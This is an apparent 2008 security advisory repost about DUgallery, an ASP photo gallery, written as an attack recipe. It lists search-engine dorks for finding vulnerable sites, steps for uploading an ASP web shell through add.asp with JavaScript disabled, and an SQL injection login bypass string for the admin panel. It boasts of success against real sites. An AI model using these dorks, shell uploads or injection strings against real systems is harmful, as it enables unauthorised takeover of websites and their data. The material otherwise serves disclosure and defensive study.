Security Advisory: DUgallery - ALL VERSIONS (Upload/SQL/) Multiple Remote Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  VMSA-2008-0015 Updated ESXi and ESX 3.5 packages address critical security issue in openwsman
  Advanced Electron Forum <= 1.0.6 Remote Code Execution
  Annuaire Téléphoniqu
e v1.0 Sensetive Files (MDP)
  PHP pro bid v 6.04 SQL injection

From: Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date: 20.09.2008
Subject: DUgallery - ALL VERSIONS (Upload/SQL/) Multiple Remote Vulnerabilities

###################################################################

# DUgallery - ALL VERSIONS!

# Discovered bay : Alemin_Krali

# my blog: al3m.blogspot.com

# inurl:pic.asp?iCat=


# inurl:cat.asp?iCat=

#-# 1-Upload Bug [HIGH!!! %75 success] new!

1-OPEN firefox
2-tools > options > content> JavaScript Not Active! and save.re open firefox.

http://[site.com]/path/add.asp ==>>> upload your Asp shell

http://[site.com]/path/pictures/yourshell.asp ==>>> your address

#-# 2-SQL INJECTION ? [HIGH!!! %95 success]

try 15 site and result 15/15 :)

site.com/path/admin_default.asp

'a

Syntax error (missing operator) in query expression 'U_ID=''a' AND U_PASSWORD='''.

USERNAME:'or','or'
PASSWORD:

and submit! welcome to admin panel (:

###################################################################

_________________________________________________________________
Windows Live Messenger'эn iзin Ьcretsiz 30 Эfadeyi yьkle
http://www.livemessenger-emoticons.com/funfamily/tr-tr/

test server